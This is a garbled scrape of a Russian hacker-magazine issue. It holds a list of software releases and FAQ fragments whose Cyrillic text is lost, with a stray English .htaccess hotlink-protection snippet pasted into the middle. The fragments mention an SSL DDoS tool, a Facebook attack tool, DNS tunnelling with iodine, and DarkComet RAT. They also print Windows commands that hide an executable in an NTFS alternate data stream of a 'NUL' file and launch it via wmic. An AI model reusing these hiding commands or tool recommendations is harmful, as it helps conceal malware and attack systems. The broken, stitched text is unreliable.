Drivel 3.0.3
Fatrat 1.1.3
Gnugk 2.3.5
Ifolder 3.8.0.3
Opera 11.52
Peerguardian 2.1.3
Qbittorrent 2.9.2
Qwit 1.1-pre2
Remmina 0.9.3
Skype 2.2.0.35
Smb4k 0.10.90
Sylpheed 3.1.2
Uget 1.8.0
>Games
Rigsofrods 0.38.64
Sauerbraten 20100728
Simutrans 110.0.1
Jfreechart 1.0.17
Jqueryui 1.8.16
Juce 1.53
Lazarus 0.9.30.2rc2
Libsdl-android
Matplotlib 1.1.0
Movicon 1.0b
Poedit 1.4.6.1
Scintilla 2.29
Symfony 2.0.4
Tcpdf 5.9.134
Ultimatepp 3211
Wxwidgets 2.9.2
>>MAC
0xED 1.0.9
Bean 2.9.7
DragonDisk 0.92
Eddie 2.1
Firefox 8.0
ImageBurner 2.0
KeyCue 6.0
Letterbox 0.24b9
LiteSpeed Web Server 4.1.7
Opera 11.52
OS Track
Palringo 4.0.1
Punto Switcher 3.2.5
Que 1.3.1
Raven 0.6
TeamViewer 6.0.10548
Tunatic 1.1
uTorrent 1.5.11
VirtualBox 4.1.4
>X-distr
Fedora 16 Desktop Edition
Puppy 5.3
Slce 6.1
Ubuntu 11.10
>System
2clickupdate 6.0
Ajenti 0.6.0
Bluez 4.96
Checkinstall 1.6.2
Collectl 3.6.0
Cryptmount 4.2.1
Fslint 2.42
Grub 1.99
Kml 3.1_001
Nilfs-utils 2.1.0-rc2
Robinhood 2.3.2
Smartmontools 5.42
Squashfs 4.2
Sysstat 10.0.2
Testdisk 6.12
Bind 9.8.1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.15
Freeradius 2.1.12
Lighttpd 1.4.29
Minidlna 1.0.22
Mysql 5.5.17
Nsd 3.2.8
Openldap 2.4.26
Openvpn 2.2.1
Postfix 2.8.6
Postgresql 9.1.1
Samba 3.6.1
Sendmail 8.14.5
Snort 2.9.1.2
Squid 3.1.16
Syslog-ng 3.3.1
Vsftpd 2.3.4
,
ant
FAQ United
FAQ@REAL.XAKEP.RU
ANDROID, .
Honeynet Project A.R.E (Android Reverse Engineering)
Android.
: Androguard,
Android sdk/ndk, APKInspector, Apktool,
Axmlprinter, Ded, Dex2jar, DroidBox, Jad,
Smali/Baksmali
.
A.R.E
redmine.honeynet.org/projects/are/wiki.
,
,
HIGHLOAD?
The Hackers Choice DDoS, SSL-.
thc-ssl-dos ,
SSL-
15 , .
SSL. ,
2003 ! -
:
-
FACEBOOK?
fbpwn (code.google.com/p/fbpwn).
, DNS-
.
DNS-
?
! DNS-
.
DNS.
,
DNS-. :
,
- .
DNS, iodine (code.kryo.se/iodine).
-
iodined:
5 : WINDOWS-
Windows-
Loggly (loggly.com).
: syslog/syslog-ng
API.
Windows
syslog. ,
. ,
, ,
API loggly.
:
f , ;
m mtu
MTU ( DNS-);
l IP
IP, ( ,
DNS-,
);
P .
-
NTFS?
,
ADS.
C:\temp>dir /r C:\temp
Directory of C:\temp
.
..
5 NUL
1 File(s)
5 bytes
,
,
iodine:
C:\temp>streams C:\temp
Streams v1.56 - Enumerate alternate NTFS data streams
(C) 1999-2007 Mark Russinovich
No files with streams found.
.
,
- (CON,
PRN, AUX, NUL, COM1, LPT1 ..),
dir /R
streams.exe .
, ,
\\?\ . ,
ADS:
,
,
DNS-.
DNS-, ,
.
WMIC:
C:\temp>wmic process call create \\?\C:\temp\NUL:hidden_ADS.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 1620;
ReturnValue = 0;
};
C:\temp>type C:\Windows\System32\cmd.exe > \\?\C:\temp\NUL:hidden_ADS.exe
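# Serve GIF/JPG files only when the Referer is mydomain.com or one of its subdomains
<FilesMatch "\.(gif|jpe?g)$">
# Flag requests whose Referer points at our own site
SetEnvIf Referer "^http://([^/]*\.)?mydomain\.com/" request_ok=1
# Allow rules are evaluated first; anything not explicitly allowed is denied
Order Allow,Deny
Allow from env=request_ok
</FilesMatch>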
(GIF JPG)
, (mydomain.com). ,
NTsyslog (troy.jdmz.net/syslogwin)
,
, Windows
syslog-. ,
, syslog-.
,
, .
Windows-
Snare (www.intersectalliance.com).
, , . Windows
Snare Agent.
-
Loggly .
. Graylog2 (graylog2.org)
syslog- , -
.
Apache'
.htaccess.
.
,
(2 ).
.
,
. ?
, , ,
. . . P2P, . -,
.
torrent- ( ).
, ,
, -,
.
Torrent2exe.com
.torrent
. DriverPack Solution 11 (drp.su/ru),
Torrent2exe. : 3 .
ant
(
cp1251,
, )
(
latin1).
. Sypex Dumper
(sypex.net).
, auto.
. ,
, cp1251,
. !
,
,
UTF-8.
UTF-8,
, . ,
UTF-8, UTF-8,
latin1.
MySQL
UTF-8,
latin1, MySQL latin1 UTF-8.
SSH-,
LINUX-?
SLIDESHARE,
. ?
,
, iptables.
, :
A ,
.
,
bash-,
-.
GitHub (https://gist.github.com/1129974).
.
.
. ?
,
cp1251,
latin1. . :
.
-
,
?
, ,
TeamViewer Chrome Remote Desktop,
Google.
DarkCometRAT (www.darkcomet-rat.com),
, -
.
, DarkComet-RAT .
,
SOCKS5,
.
:).
TOR.
(
-- ),
.
,
SOCKS, Tor-.
Torsocks (code.google.com/p/torsocks):
$ usewithtor [application]
MySQL 4.1 ;
,
/proc/net/ipt_recent/SSH.
.
, -
application ,
Tor.
. , ssh
some.ssh.com, Tor:
$ usewithtor ssh username@some.ssh.com
,
.
SWF-, ,
.
as3-proxy
(github.com/alun/as3-proxy).
-
Apparat (code.google.com/p/apparat)
.
,
. z
UNITS /
+ Bluetooth=
SMS
.
SMS .
, .
1
2
. Bluetooth,
(pairing)
.
,
.
2
AT-,
SMS-
.
,
Bluetooth-.
3
.
,
.
4
, ,
TeamViewer.